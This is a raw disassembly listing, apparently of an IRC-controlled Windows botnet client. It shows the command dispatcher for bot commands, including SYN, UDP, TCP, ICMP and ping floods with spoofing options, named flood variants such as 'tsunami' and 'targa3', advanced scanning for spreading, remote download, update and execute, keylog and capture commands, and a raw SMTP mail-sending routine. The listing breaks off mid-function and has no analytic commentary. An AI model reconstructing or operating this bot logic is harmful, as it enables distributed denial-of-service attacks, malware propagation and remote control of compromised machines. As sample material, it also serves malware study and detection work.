; ---------------------------------------------------------------------------
loc_4062B5: ; CODE XREF: sub_401CC7+45E2�j
push offset unk_442210
jmp loc_408850
; ---------------------------------------------------------------------------
loc_4062BF: ; CODE XREF: sub_401CC7+45AF�j
push [ebp+Source] ; Str2
push offset aStop ; "stop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4062E9
push [ebp+Src]
push 4
call sub_41958E
pop ecx
pop ecx
push eax
push offset aS_4 ; "%s"
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_4062E9: ; CODE XREF: sub_401CC7+4609�j
push [ebp+Source] ; Str2
push offset aPause ; "pause"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_406313
push [ebp+Src]
push 5
call sub_41958E
pop ecx
pop ecx
push eax
push offset aS_5 ; "%s"
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_406313: ; CODE XREF: sub_401CC7+4633�j
push [ebp+Source] ; Str2
push offset aContinue ; "continue"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40633D
push [ebp+Src]
push 6
call sub_41958E
pop ecx
pop ecx
push eax
push offset aS_6 ; "%s"
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_40633D: ; CODE XREF: sub_401CC7+465D�j
push [ebp+Source] ; Str2
push offset aDelete_0 ; "delete"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_406367
push [ebp+Src]
push 1
call sub_41958E
pop ecx
pop ecx
push eax
push offset aS_7 ; "%s"
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_406367: ; CODE XREF: sub_401CC7+4687�j
push [ebp+Source] ; Str2
push offset aShare ; "share"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4063E6
cmp edi, ebx
jz short loc_4063B9
cmp [ebp+var_8FC], bl
jz short loc_40639D
push ebx ; int
push edi ; Str
push 1 ; int
call sub_419965
add esp, 0Ch
push eax
push offset aS_8 ; "%s"
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_40639D: ; CODE XREF: sub_401CC7+46BD�j
push [ebp+esi+Str2] ; int
push edi ; Str
push ebx ; int
call sub_419965
add esp, 0Ch
push eax
push offset aS_9 ; "%s"
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_4063B9: ; CODE XREF: sub_401CC7+46B5�j
push ebx ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_419B5B
add esp, 10h
test eax, eax
jz short loc_4063DC
push offset unk_442274
jmp loc_408850
; ---------------------------------------------------------------------------
loc_4063DC: ; CODE XREF: sub_401CC7+4709�j
push offset unk_442298
jmp loc_408850
; ---------------------------------------------------------------------------
loc_4063E6: ; CODE XREF: sub_401CC7+46B1�j
push [ebp+Source] ; Str2
push offset aUser_0 ; "user"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40649D
cmp edi, ebx
jz short loc_406470
cmp [ebp+var_8FC], bl
jz short loc_40642C
push [ebp+var_4]
push [ebp+Format]
push [ebp+arg_4]
push ebx
push edi
push 1
call sub_419C7C
add esp, 18h
push eax
push offset aS_10 ; "%s"
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_40642C: ; CODE XREF: sub_401CC7+4740�j
push [ebp+var_4]
mov esi, [ebp+esi+Str2]
cmp esi, ebx
push [ebp+Format]
push [ebp+arg_4]
jz short loc_406459
push esi
push edi
push ebx
call sub_419C7C
add esp, 18h
push eax
push offset aS_11 ; "%s"
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_406459: ; CODE XREF: sub_401CC7+477A�j
push ebx
push edi
push 2
call sub_419C7C
add esp, 18h
push eax
push offset aS_12 ; "%s"
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_406470: ; CODE XREF: sub_401CC7+4738�j
push ebx ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_41A1AC
add esp, 10h
test eax, eax
jz short loc_406493
push offset unk_4422CC
jmp loc_408850
; ---------------------------------------------------------------------------
loc_406493: ; CODE XREF: sub_401CC7+47C0�j
push offset unk_4422EC
jmp loc_408850
; ---------------------------------------------------------------------------
loc_40649D: ; CODE XREF: sub_401CC7+4730�j
push [ebp+Source] ; Str2
push offset aSend_0 ; "send"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4064E0
cmp edi, ebx
jz short loc_4064D6
push [ebp+var_4]
push [ebp+Format]
push [ebp+arg_4]
push [ebp+Src] ; Source
call sub_41A460
add esp, 10h
push eax
push offset aS_13 ; "%s"
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_4064D6: ; CODE XREF: sub_401CC7+47EB�j
push offset unk_442318
jmp loc_408850
; ---------------------------------------------------------------------------
loc_4064E0: ; CODE XREF: sub_401CC7+47E7�j
push offset unk_44233C
jmp loc_408850
; ---------------------------------------------------------------------------
loc_4064EA: ; CODE XREF: sub_401CC7+4559�j
push edi ; Str2
push offset aCapture ; "capture"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4090A0
push edi ; Str2
push offset aCap ; "cap"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4090A0
push edi ; Str2
push offset aGethost ; "gethost"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408FAC
push edi ; Str2
push offset aGh ; "gh"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408FAC
loc_40653E: ; CODE XREF: sub_401CC7+3CB7�j
; sub_401CC7+3CE6�j ...
mov edi, [ebp+esi+Format]
cmp edi, ebx
mov [ebp+arg_1C], edi
jz loc_402085
push [ebp+arg_8] ; Str2
push offset aKilllog ; "killlog"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408F92
push [ebp+arg_8] ; Str2
push offset aKl ; "kl"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408F92
push [ebp+arg_8] ; Str2
push offset aAddalias ; "addalias"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408F4F
push [ebp+arg_8] ; Str2
push offset aAa ; "aa"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408F4F
push [ebp+arg_8] ; Str2
push offset aPrivmsg_1 ; "privmsg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408EFA
push [ebp+arg_8] ; Str2
push offset aPm ; "pm"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408EFA
push [ebp+arg_8] ; Str2
push offset aAction ; "action"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408E8D
push [ebp+arg_8] ; Str2
push offset aA ; "a"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408E8D
push [ebp+arg_8] ; Str2
push offset aCycle ; "cycle"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408E29
push [ebp+arg_8] ; Str2
push offset aCy ; "cy"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408E29
push [ebp+arg_8] ; Str2
push offset aMode_0 ; "mode"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408DED
push [ebp+arg_8] ; Str2
push offset aM ; "m"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408DED
push [ebp+arg_8] ; Str2
push offset aC_raw ; "c_raw"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408D7E
push [ebp+arg_8] ; Str2
push offset aC_r ; "c_r"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408D7E
push [ebp+arg_8] ; Str2
push offset aC_mode ; "c_mode"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408CF8
push [ebp+arg_8] ; Str2
push offset aC_m ; "c_m"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408CF8
push [ebp+arg_8] ; Str2
push offset aC_nick ; "c_nick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408C88
push [ebp+arg_8] ; Str2
push offset aC_n ; "c_n"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408C88
push [ebp+arg_8] ; Str2
push offset aC_join ; "c_join"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408C3A
push [ebp+arg_8] ; Str2
push offset aC_j ; "c_j"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408C3A
push [ebp+arg_8] ; Str2
push offset aC_part ; "c_part"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408BD6
push [ebp+arg_8] ; Str2
push offset aC_p ; "c_p"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408BD6
push [ebp+arg_8] ; Str2
push offset aTarga3 ; "targa3"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408B01
push [ebp+arg_8] ; Str2
push offset aT3 ; "t3"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408B01
push [ebp+arg_8] ; Str2
push offset aTsunami ; "tsunami"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408A06
push [ebp+arg_8] ; Str2
push offset aTsn ; "tsn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408A06
push [ebp+arg_8] ; Str2
push offset aRepeat ; "repeat"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408902
push [ebp+arg_8] ; Str2
push offset aRp ; "rp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408902
push [ebp+arg_8] ; Str2
push offset aDelay ; "delay"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408863
push [ebp+arg_8] ; Str2
push offset aDe ; "de"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408863
push [ebp+arg_8] ; Str2
push offset aUpdate ; "update"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4086D2
push [ebp+arg_8] ; Str2
push offset aUp_0 ; "up"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4086D2
push [ebp+arg_8] ; Str2
push offset aExecute ; "execute"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40863F
push [ebp+arg_8] ; Str2
push offset aE ; "e"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40863F
push [ebp+arg_8] ; Str2
push offset aFindfile ; "findfile"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408530
push [ebp+arg_8] ; Str2
push offset aFf ; "ff"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408530
push [ebp+arg_8] ; Str2
push offset aRename ; "rename"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4084B9
push [ebp+arg_8] ; Str2
push offset aMv ; "mv"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4084B9
push [ebp+arg_8] ; Str2
push offset aIcmpflood ; "icmpflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4083BC
push [ebp+arg_8] ; Str2
push offset aIcmp ; "icmp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4083BC
mov eax, [ebp+esi+Str2]
cmp eax, ebx
mov [ebp+Src], eax
jz loc_402085
push [ebp+arg_8] ; Str2
push offset aClone_0 ; "clone"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4082D4
push [ebp+arg_8] ; Str2
push offset aC ; "c"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4082D4
push [ebp+arg_8] ; Str2
push offset aDdos_syn ; "ddos.syn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4081DB
push [ebp+arg_8] ; Str2
push offset aDdos_ack ; "ddos.ack"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4081DB
push [ebp+arg_8] ; Str2
push offset aDdos_random ; "ddos.random"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4081DB
push [ebp+arg_8] ; Str2
push offset aWisdom_udp ; "wisdom.udp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_406A51
push 7Fh
lea eax, [ebp+var_327C]
pop esi
push esi ; Count
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_31FC]
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_317C]
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_30FC]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
mov esi, [ebp+arg_4]
mov [ebp+var_3074], eax
push ebx ; int
lea eax, [ebp+Dst]
push 13h ; int
push eax ; Source
mov [ebp+var_3078], edi
mov [ebp+var_3280], esi
call sub_40B756
add esp, 3Ch
mov [ebp+var_307C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3280]
push ebx
push eax
push offset sub_41514F
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_307C]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_406A40
loc_406A2A: ; CODE XREF: sub_401CC7+4D77�j
cmp [ebp+var_3070], ebx
jnz loc_403F8B
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_406A2A
; ---------------------------------------------------------------------------
loc_406A40: ; CODE XREF: sub_401CC7+4D61�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_442D88
jmp loc_403F7C
; ---------------------------------------------------------------------------
loc_406A51: ; CODE XREF: sub_401CC7+4CB7�j
push [ebp+arg_8] ; Str2
push offset aSynflood ; "synflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4080F3
push [ebp+arg_8] ; Str2
push offset aSyn ; "syn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4080F3
push [ebp+arg_8] ; Str2
push offset aSkysyn ; "skysyn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_406B7E
push 7Fh
lea eax, [ebp+var_36A4]
pop esi
push esi ; Count
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3624]
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_35A4]
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3524]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 30h
mov esi, [ebp+arg_4]
mov [ebp+var_34A0], eax
push [ebp+Src]
mov eax, [ebp+var_8]
mov [ebp+var_349C], eax
lea eax, [ebp+Dst]
push edi
mov [ebp+var_36A8], esi
push [ebp+Source]
push offset asc_442E48 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 10h ; int
push eax ; Source
call sub_40B756
add esp, 20h
mov [ebp+var_34A4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_36A8]
push ebx
push eax
push offset sub_4140A7
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_34A4]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_406B6D
loc_406B57: ; CODE XREF: sub_401CC7+4EA4�j
cmp [ebp+var_3498], ebx
jnz loc_4074F3
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_406B57
; ---------------------------------------------------------------------------
loc_406B6D: ; CODE XREF: sub_401CC7+4E8E�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_442E78
jmp loc_4074E4
; ---------------------------------------------------------------------------
loc_406B7E: ; CODE XREF: sub_401CC7+4DC9�j
push [ebp+arg_8] ; Str2
push offset aPhatwonk ; "phatwonk"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40800B
push [ebp+arg_8] ; Str2
push offset aWonk ; "wonk"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40800B
push [ebp+arg_8] ; Str2
push offset aDownload ; "download"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407ECD
push [ebp+arg_8] ; Str2
push offset aDl ; "dl"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407ECD
push [ebp+arg_8] ; Str2
push offset aRedirect ; "redirect"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407DD0
push [ebp+arg_8] ; Str2
push offset aRd ; "rd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407DD0
push [ebp+arg_8] ; Str2
push offset aScan_0 ; "scan"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407CDD
push [ebp+arg_8] ; Str2
push offset aSc ; "sc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407CDD
push [ebp+arg_8] ; Str2
push offset aC_privmsg ; "c_privmsg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407BD8
push [ebp+arg_8] ; Str2
push offset aC_pm ; "c_pm"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407BD8
push [ebp+arg_8] ; Str2
push offset aC_action ; "c_action"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407AE0
push [ebp+arg_8] ; Str2
push offset aC_a ; "c_a"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407AE0
mov eax, [ebp+esi+var_80]
cmp eax, ebx
mov [ebp+arg_18], eax
jz loc_402085
push [ebp+arg_8] ; Str2
push offset aPortscan ; "portscan"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4079DA
push [ebp+arg_8] ; Str2
push offset aPsc ; "psc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4079DA
push [ebp+arg_8] ; Str2
push offset aAdvscan ; "advscan"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407513
push [ebp+arg_8] ; Str2
push offset aAsc ; "asc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407513
push [ebp+arg_8] ; Str2
push offset aUdpflood ; "udpflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4073CA
push [ebp+arg_8] ; Str2
push offset aUdp ; "udp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4073CA
push [ebp+arg_8] ; Str2
push offset aU ; "u"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4073CA
push [ebp+arg_8] ; Str2
push offset aNetsend ; "netsend"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4072BC
push [ebp+arg_8] ; Str2
push offset aNs ; "ns"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4072BC
push [ebp+arg_8] ; Str2
push offset aPingflood ; "pingflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407192
push [ebp+arg_8] ; Str2
push offset aPing_0 ; "ping"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407192
push [ebp+arg_8] ; Str2
push offset aP ; "p"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407192
push [ebp+arg_8] ; Str2
push offset aTcpflood ; "tcpflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_406FE9
push [ebp+arg_8] ; Str2
push offset aTcp ; "tcp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_406FE9
push [ebp+arg_8] ; Str2
push offset aEmail ; "email"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_406F91
push [ebp+Source] ; Source
lea eax, [ebp+var_47EC]
push eax ; Dest
call _strcpy
push edi ; Str
call _atoi
push [ebp+Src] ; Source
mov [ebp+Source], eax
lea eax, [ebp+var_4188]
push eax ; Dest
call _strcpy
push [ebp+arg_18] ; Source
lea eax, [ebp+var_4588]
push eax ; Dest
call _strcpy
push offset asc_443650 ; " "
push offset a__1 ; "_"
push [ebp+esi+var_7C] ; Src
call sub_418C07
push eax ; Source
lea eax, [ebp+var_4288]
push eax ; Dest
call _strcpy
add esp, 30h
lea eax, [ebp+var_5588]
push eax
push 101h
call dword_4E3068 ; WSAStartup
lea eax, [ebp+var_47EC]
push eax
call dword_4E317C ; gethostbyname
push 6
push 1
push 2
mov edi, eax
call dword_4E3178 ; socket
push [ebp+Source]
mov esi, eax
mov [ebp+var_31C], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_318], eax
call dword_4E30F8 ; htons
mov [ebp+var_31A], ax
lea eax, [ebp+var_4288]
push eax
lea eax, [ebp+var_4188]
push eax
lea eax, [ebp+var_4288]
push eax
lea eax, [ebp+var_4588]
push eax
lea eax, [ebp+var_4188]
push eax
lea eax, [ebp+var_5988]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax ; Dest
call _sprintf
add esp, 1Ch
lea eax, [ebp+var_31C]
push 10h
push eax
push esi
call dword_4E30A0 ; connect
mov edi, 100h
push ebx
lea eax, [ebp+var_4088]
push edi
push eax
push esi
call dword_4E3110 ; recv
lea eax, [ebp+var_4088]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_5988]
push eax
push esi
call dword_4E3148 ; send
push ebx
lea eax, [ebp+var_4088]
push edi
push eax
push esi
call dword_4E3110 ; recv
push esi
call dword_4E3190 ; closesocket
call dword_4E3050 ; WSACleanup
lea eax, [ebp+var_4588]
push eax
push offset asc_4436A4 ; "-"
loc_406F4A: ; CODE XREF: sub_401CC7+2E73�j
; sub_401CC7+45C7�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
loc_406F56: ; CODE XREF: sub_401CC7+247C�j
add esp, 0Ch
loc_406F59: ; CODE XREF: sub_401CC7+457C�j
; sub_401CC7+66D4�j ...
cmp [ebp+var_8], ebx
jnz short loc_406F7A
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 14h
loc_406F7A: ; CODE XREF: sub_401CC7+29A3�j
; sub_401CC7+29F6�j ...
mov esi, [ebp+File]
loc_406F7D: ; CODE XREF: sub_401CC7+6973�j
; sub_401CC7+7998�j ...
lea eax, [ebp+Dst]
push eax
call sub_415C3F
pop ecx
mov eax, esi
jmp loc_402088
; ---------------------------------------------------------------------------
loc_406F91: ; CODE XREF: sub_401CC7+512D�j
push [ebp+arg_8] ; Str2
push offset aHttpcon ; "httpcon"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_406FBB
push [ebp+arg_8] ; Str2
push offset aHcon ; "hcon"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_407563
loc_406FBB: ; CODE XREF: sub_401CC7+52DB�j
push [ebp+esi+var_7C] ; int
push [ebp+arg_18] ; int
push [ebp+Src] ; int
push edi ; Str
call _atoi
pop ecx
push eax ; int
push [ebp+Source] ; int
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_410B5C
jmp loc_404295
; ---------------------------------------------------------------------------
loc_406FE9: ; CODE XREF: sub_401CC7+50FF�j
; sub_401CC7+5116�j
push [ebp+Source] ; Format
mov esi, 80h
lea eax, [ebp+var_1354]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+var_1354]
push eax ; Str2
push offset aSyn_0 ; "syn"
call _strcmp
add esp, 14h
test eax, eax
jz short loc_40704E
lea eax, [ebp+var_1354]
push eax ; Str2
push offset aAck ; "ack"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40704E
lea eax, [ebp+var_1354]
push eax ; Str2
push offset aRandom_0 ; "random"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40704E
push offset unk_44361C
jmp loc_40717F
; ---------------------------------------------------------------------------
loc_40704E: ; CODE XREF: sub_401CC7+534D�j
; sub_401CC7+5364�j ...
push [ebp+arg_18] ; Str
call _atoi
cmp eax, ebx
pop ecx
mov [ebp+var_124C], eax
jle loc_40717A
push [ebp+Source] ; Format
lea eax, [ebp+var_1354]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+var_13D4]
push edi ; Format
push esi ; Count
push eax ; Dest
call __snprintf
push [ebp+Src] ; Str
call _atoi
mov [ebp+var_1250], eax
add esp, 10h
xor eax, eax
cmp [ebp+var_8EE], bl
push [ebp+Format] ; Format
setnz al
mov [ebp+var_1248], eax
mov eax, [ebp+arg_4]
mov [ebp+var_13D8], eax
lea eax, [ebp+var_12D4]
push esi ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_4]
add esp, 0Ch
cmp [ebp+var_1248], ebx
mov [ebp+var_1244], eax
mov eax, [ebp+var_8]
mov [ebp+var_1240], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_4070EB
mov eax, offset aNormal ; "Normal"
loc_4070EB: ; CODE XREF: sub_401CC7+541D�j
push [ebp+arg_18]
push [ebp+Src]
push edi
push [ebp+Source]
push eax
push offset asc_443578 ; "-"
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+Dst]
push 14h ; int
push eax ; Source
call sub_40B756
add esp, 2Ch
mov [ebp+var_1254], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_13D8]
push ebx
push eax
push offset sub_4148B6
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_1254]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_407169
loc_407153: ; CODE XREF: sub_401CC7+54A0�j
cmp [ebp+var_123C], ebx
jnz loc_408506
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_407153
; ---------------------------------------------------------------------------
loc_407169: ; CODE XREF: sub_401CC7+548A�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_4435AC
jmp loc_404BD6
; ---------------------------------------------------------------------------
loc_40717A: ; CODE XREF: sub_401CC7+5398�j
push offset asc_4435E4 ; "-"
loc_40717F: ; CODE XREF: sub_401CC7+2009�j
; sub_401CC7+201F�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_408506
; ---------------------------------------------------------------------------
loc_407192: ; CODE XREF: sub_401CC7+50BA�j
; sub_401CC7+50D1�j ...
cmp dword_4E31E8, ebx
jnz loc_4072A1
mov eax, [ebp+var_8]
push 7Fh ; Count
push [ebp+Source] ; Source
mov [ebp+var_FF4], eax
mov eax, [ebp+var_4]
mov [ebp+var_FF8], eax
lea eax, [ebp+var_108C]
push eax ; Dest
call _strncpy
push edi ; Str
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_100C], eax
call _atoi
push [ebp+arg_18] ; Str
mov [ebp+var_1008], eax
call _atoi
push 7Fh ; Count
mov [ebp+var_1004], eax
push [ebp+Format] ; Source
lea eax, [ebp+var_110C]
push eax ; Dest
call _strncpy
mov eax, [ebp+arg_4]
add esp, 24h
mov [ebp+var_1110], eax
lea eax, [ebp+var_108C]
push [ebp+var_1004]
push [ebp+var_1008]
push eax
lea eax, [ebp+Dst]
push [ebp+var_100C]
push offset asc_4434B0 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 16h ; int
push eax ; Source
call sub_40B756
add esp, 24h
mov [ebp+var_FFC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1110]
push ebx
push eax
push offset sub_413D05
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_FFC]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_407290
loc_40727A: ; CODE XREF: sub_401CC7+55C7�j
cmp [ebp+var_FF0], ebx
jnz loc_408506
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_40727A
; ---------------------------------------------------------------------------
loc_407290: ; CODE XREF: sub_401CC7+55B1�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_4434F8
jmp loc_404BD6
; ---------------------------------------------------------------------------
loc_4072A1: ; CODE XREF: sub_401CC7+54D1�j
push 1FFh ; Count
lea eax, [ebp+Dst]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax ; Dest
call _strncpy
jmp loc_408503
; ---------------------------------------------------------------------------
loc_4072BC: ; CODE XREF: sub_401CC7+508C�j
; sub_401CC7+50A3�j
push edi
lea eax, [ebp+Dst]
push [ebp+Source]
push [ebp+Src]
push offset asc_4433BC ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
push [ebp+Src] ; Str
call _strlen
mov edx, eax
push edi ; Str
mov edi, edx
call _strlen
push [ebp+Source] ; Str
add edi, eax
call _strlen
push [ebp+arg_8] ; Str
add edi, eax
call _strlen
add eax, [ebp+var_C]
push [ebp+arg_18] ; SubStr
lea eax, [eax+edi+7]
push eax ; Str
call _strstr
add esp, 40h
mov [ebp+arg_C], eax
push [ebp+Src] ; Str
call _atoi
mov edi, [ebp+arg_1C]
cmp eax, ebx
pop ecx
mov [ebp+arg_14], eax
mov [ebp+arg_20], ebx
jle short loc_4073B6
loc_40733F: ; CODE XREF: sub_401CC7+569C�j
push [ebp+arg_C] ; int
push edi ; int
push [ebp+Source] ; Source
call sub_419471
add esp, 0Ch
cmp eax, 1
mov [ebp+arg_1C], eax
jz short loc_407367
cmp eax, ebx
jnz short loc_407386
inc [ebp+arg_20]
mov eax, [ebp+arg_20]
cmp eax, [ebp+arg_14]
jl short loc_40733F
jmp short loc_4073BF
; ---------------------------------------------------------------------------
loc_407367: ; CODE XREF: sub_401CC7+568D�j
push ebx ; int
push [ebp+var_4] ; int
push offset unk_4433F8 ; int
loc_407370: ; CODE XREF: sub_401CC7+5701�j
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
